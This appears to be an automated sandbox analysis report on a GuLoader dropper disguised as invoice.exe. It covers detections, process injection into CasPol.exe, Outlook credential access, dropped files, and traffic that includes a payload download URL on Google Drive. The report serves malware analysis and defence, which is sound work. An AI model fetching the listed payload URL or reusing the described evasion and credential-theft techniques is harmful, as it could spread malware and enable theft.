Edit tour

Windows Analysis Report
invoice.exe

Overview

General Information

Sample Name:	invoice.exe
Analysis ID:	828743
MD5:	f111934675c34cca18d9d76fc34a2e40
SHA1:	6c54e0fbae03df56fee84195f3deb4d2ebd8d8c1
SHA256:	c627b8bb6c4ea0cf03aa2d209d0ecc53ff9784283328dabd44c1675aef0939c2
Infos:

Detection

GuLoader

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Snort IDS alert for network traffic

Tries to steal Mail credentials (via file / registry access)

Initial sample is a PE file and has a suspicious name

Writes to foreign memory regions

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

May check the online IP address of the machine

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

One or more processes crash

Drops certificate files (DER)

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Abnormal high CPU Usage

Enables debug privileges

AV process strings found (often used to terminate AV products)

Found inlined nop instructions (likely shell or obfuscated code)

PE file does not import any functions

Sample file is different than original file name gathered from version info

Drops PE files

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

PE / OLE file has an invalid certificate

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64native

invoice.exe (PID: 4636 cmdline: C:\Users\user\Desktop\invoice.exe MD5: F111934675C34CCA18D9D76FC34A2E40)

CasPol.exe (PID: 1520 cmdline: C:\Users\user\Desktop\invoice.exe MD5: 914F728C04D3EDDD5FBA59420E74E56B)

conhost.exe (PID: 2356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

WerFault.exe (PID: 4620 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 2544 MD5: 40A149513D721F096DDF50C04DA2F01F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://blog.malwarebytes.com/scams/2020/08/sba-phishing-scams-from-malware-to-advanced-social-engineering/ https://blog.morphisec.com/guloader-the-rat-downloader https://blog.vincss.net/2020/05/re014-guloader-antivm-techniques.html https://cert-agid.gov.it/news/malware/tecniche-per-semplificare-lanalisi-del-malware-guloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.8704170676.000000000666B000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Snort Signatures

ET TROJAN 404/Snake/Matiex Keylogger Style External IP Check - Source IP: 192.168.11.20 - Destination IP: 193.122.130.0

Timestamp:	192.168.11.20193.122.130.049842802039190 03/17/23-14:34:28.679795
SID:	2039190
Source Port:	49842
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: invoice.exe	Virustotal: Detection: 27%			Perma Link
Source: invoice.exe	ReversingLabs: Detection: 35%

Source: invoice.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 142.250.184.206:443 -> 192.168.11.20:49840 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.33:443 -> 192.168.11.20:49841 version: TLS 1.2

Source: invoice.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.pdb source: CasPol.exe, 00000005.00000002.9019911661.0000000039A58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.PDBb source: CasPol.exe, 00000005.00000002.9019911661.0000000039A58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: caspol.pdbcaspol.pdbpdbpol.pdb\v4.0.30319\caspol.pdb source: CasPol.exe, 00000005.00000002.9012404165.0000000037637000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\caspol.pdbIN source: CasPol.exe, 00000005.00000002.9019911661.0000000039A58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\caspol.pdbpdbpol.pdb source: CasPol.exe, 00000005.00000002.9019911661.0000000039A58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: caspol.pdb source: CasPol.exe, 00000005.00000002.8995413020.0000000006F1D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\caspol.pdb. source: CasPol.exe, 00000005.00000002.9021000119.0000000039ACD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: vcaspol.PDB 7 source: CasPol.exe, 00000005.00000002.9012404165.0000000037637000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: m,C:\Windows\caspol.pdb source: CasPol.exe, 00000005.00000002.9012404165.0000000037637000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\caspol.pdbr^ source: CasPol.exe, 00000005.00000002.9021000119.0000000039ACD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.pdbe089 source: CasPol.exe, 00000005.00000002.9019911661.0000000039A58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\caspol.pdbN_ source: CasPol.exe, 00000005.00000002.9019911661.0000000039A58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 9##.pdb source: CasPol.exe, 00000005.00000002.9012404165.0000000037637000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mC:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.pdb source: CasPol.exe, 00000005.00000002.9012404165.0000000037637000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: m.pdb source: CasPol.exe, 00000005.00000002.9012404165.0000000037637000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: c7symbols\exe\caspol.pdb source: CasPol.exe, 00000005.00000002.9012404165.0000000037637000.00000004.00000010.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\invoice.exe	Code function: 1_2_00406268 FindFirstFileA,FindClose,	1_2_00406268
Source: C:\Users\user\Desktop\invoice.exe	Code function: 1_2_0040572D GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	1_2_0040572D
Source: C:\Users\user\Desktop\invoice.exe	Code function: 1_2_004026F8 FindFirstFileA,	1_2_004026F8

Source: C:\Users\user\Desktop\invoice.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then jmp 377478CCh		5_2_37746DE3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h		5_2_37746300

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2039190 ET TROJAN 404/Snake/Matiex Keylogger Style External IP Check 192.168.11.20:49842 -> 193.122.130.0:80

May check the online IP address of the machine

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: checkip.dyndns.org

Source: Joe Sandbox View

ASN Name: ORACLE-BMC-31898US ORACLE-BMC-31898US

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Joe Sandbox View

IP Address: 193.122.130.0 193.122.130.0

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1v9qH2HQVytFc1xq78jdiMix-1m6jIF0S HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/s4sbn26f0am6hqllsu7edmokcls88pe1/1679060025000/12467729248612761337/*/1v9qH2HQVytFc1xq78jdiMix-1m6jIF0S?e=download&uuid=a6a0f6a4-7f4f-44fa-b2c7-5636188002aa HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0k-a8-docs.googleusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: invoice.exe, 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: invoice.exe, 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: invoice.exe, 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: CasPol.exe, 00000005.00000002.9014975295.0000000037959000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: CasPol.exe, 00000005.00000002.9014975295.0000000037959000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: CasPol.exe, 00000005.00000002.9014975295.00000000378A1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.8995413020.0000000006E3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: CasPol.exe, 00000005.00000002.8995413020.0000000006ED6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: CasPol.exe, 00000005.00000003.8679430245.0000000006ED3000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.8995413020.0000000006ED2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: invoice.exe, 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: invoice.exe, 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: invoice.exe, 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: invoice.exe, 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: invoice.exe, 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: invoice.exe, 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: invoice.exe, 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: invoice.exe, invoice.exe, 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp, invoice.exe, 00000001.00000000.7326800375.000000000040A000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: invoice.exe, 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp, invoice.exe, 00000001.00000000.7326800375.000000000040A000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: invoice.exe, 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: invoice.exe, 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://ocsp.digicert.com0N
Source: invoice.exe, 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: CasPol.exe, 00000005.00000002.9014975295.00000000378A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: invoice.exe, 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.avast.com0/
Source: invoice.exe, 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: CasPol.exe, 00000005.00000003.8679430245.0000000006EFD000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.8995413020.0000000006E97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doc-0k-a8-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/s4sbn26f
Source: CasPol.exe, 00000005.00000002.8995413020.0000000006E3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: CasPol.exe, 00000005.00000002.8995413020.0000000006E3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1v9qH2HQVytFc1xq78jdiMix-1m6jIF0S
Source: invoice.exe, 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1v9qH2HQVytFc1xq78jdiMix-1m6jIF0S HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/s4sbn26f0am6hqllsu7edmokcls88pe1/1679060025000/12467729248612761337/*/1v9qH2HQVytFc1xq78jdiMix-1m6jIF0S?e=download&uuid=a6a0f6a4-7f4f-44fa-b2c7-5636188002aa HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0k-a8-docs.googleusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 142.250.184.206:443 -> 192.168.11.20:49840 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.33:443 -> 192.168.11.20:49841 version: TLS 1.2

Source: C:\Users\user\Desktop\invoice.exe

Code function: 1_2_004051CA GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard,

1_2_004051CA

Source: C:\Users\user\Desktop\invoice.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Diskofils\Justiciaryship\vmusbmouse.cat

Jump to dropped file

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: invoice.exe

Source: invoice.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 2544

Source: C:\Users\user\Desktop\invoice.exe

Code function: 1_2_004031F1 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

1_2_004031F1

Source: C:\Users\user\Desktop\invoice.exe	Code function: 1_2_00406742	1_2_00406742
Source: C:\Users\user\Desktop\invoice.exe	Code function: 1_2_00404A09	1_2_00404A09
Source: C:\Users\user\Desktop\invoice.exe	Code function: 1_2_00406F19	1_2_00406F19
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_37746DE3	5_2_37746DE3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_37746300	5_2_37746300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_377462EF	5_2_377462EF

Source: C:\Users\user\Desktop\invoice.exe

Process Stats: CPU usage > 98%

Source: lang-1059.dll.1.dr

Static PE information: No import functions for PE file found

Source: invoice.exe, 00000001.00000000.7326884916.0000000000441000.00000002.00000001.01000000.00000003.sdmp

Binary or memory string: OriginalFilenamepaaklders Nonblameful.exe` vs invoice.exe

Source: C:\Users\user\Desktop\invoice.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: edgegdi.dll			Jump to behavior

Source: invoice.exe

Static PE information: invalid certificate

Source: invoice.exe	Virustotal: Detection: 27%
Source: invoice.exe	ReversingLabs: Detection: 35%

Source: C:\Users\user\Desktop\invoice.exe

File read: C:\Users\user\Desktop\invoice.exe

Jump to behavior

Source: invoice.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\invoice.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\invoice.exe C:\Users\user\Desktop\invoice.exe
Source: C:\Users\user\Desktop\invoice.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\Desktop\invoice.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 2544
Source: C:\Users\user\Desktop\invoice.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\Desktop\invoice.exe	Jump to behavior

Source: C:\Users\user\Desktop\invoice.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\invoice.exe

1_2_004031F1

Source: C:\Users\user\Desktop\invoice.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository

Jump to behavior

Source: C:\Users\user\Desktop\invoice.exe

File created: C:\Users\user\AppData\Local\Temp\nsdA999.tmp

Jump to behavior

Source: classification engine

Classification label: mal88.troj.spyw.evad.winEXE@5/19@3/3

Source: C:\Users\user\Desktop\invoice.exe

Code function: 1_2_004020CB LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,

1_2_004020CB

Source: C:\Users\user\Desktop\invoice.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\invoice.exe

Code function: 1_2_00404496 GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,LdrInitializeThunk,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

1_2_00404496

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2356:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2356:304:WilStaging_02
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1520

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: invoice.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.pdb source: CasPol.exe, 00000005.00000002.9019911661.0000000039A58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.PDBb source: CasPol.exe, 00000005.00000002.9019911661.0000000039A58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: caspol.pdbcaspol.pdbpdbpol.pdb\v4.0.30319\caspol.pdb source: CasPol.exe, 00000005.00000002.9012404165.0000000037637000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\caspol.pdbIN source: CasPol.exe, 00000005.00000002.9019911661.0000000039A58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\caspol.pdbpdbpol.pdb source: CasPol.exe, 00000005.00000002.9019911661.0000000039A58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: caspol.pdb source: CasPol.exe, 00000005.00000002.8995413020.0000000006F1D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\caspol.pdb. source: CasPol.exe, 00000005.00000002.9021000119.0000000039ACD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: vcaspol.PDB 7 source: CasPol.exe, 00000005.00000002.9012404165.0000000037637000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: m,C:\Windows\caspol.pdb source: CasPol.exe, 00000005.00000002.9012404165.0000000037637000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\caspol.pdbr^ source: CasPol.exe, 00000005.00000002.9021000119.0000000039ACD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.pdbe089 source: CasPol.exe, 00000005.00000002.9019911661.0000000039A58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\caspol.pdbN_ source: CasPol.exe, 00000005.00000002.9019911661.0000000039A58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 9##.pdb source: CasPol.exe, 00000005.00000002.9012404165.0000000037637000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mC:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.pdb source: CasPol.exe, 00000005.00000002.9012404165.0000000037637000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: m.pdb source: CasPol.exe, 00000005.00000002.9012404165.0000000037637000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: c7symbols\exe\caspol.pdb source: CasPol.exe, 00000005.00000002.9012404165.0000000037637000.00000004.00000010.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000001.00000002.8704170676.000000000666B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\invoice.exe

Code function: 1_2_10002D20 push eax; ret

1_2_10002D4E

Source: Mss32.dll.1.dr	Static PE information: section name: MSSMIXER
Source: NMDllHost.exe.1.dr	Static PE information: section name: .shared

Source: C:\Users\user\Desktop\invoice.exe

Code function: 1_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

1_2_10001A5D

Source: C:\Users\user\Desktop\invoice.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Ath_CoexAgent.exe	Jump to dropped file
Source: C:\Users\user\Desktop\invoice.exe	File created: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\invoice.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Inkshed\NMDllHost.exe	Jump to dropped file
Source: C:\Users\user\Desktop\invoice.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Inkshed\Mss32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\invoice.exe	File created: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\AdvSplash.dll	Jump to dropped file
Source: C:\Users\user\Desktop\invoice.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository\Antimodernly\trever\Hovedinteressers\lang-1059.dll	Jump to dropped file

Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
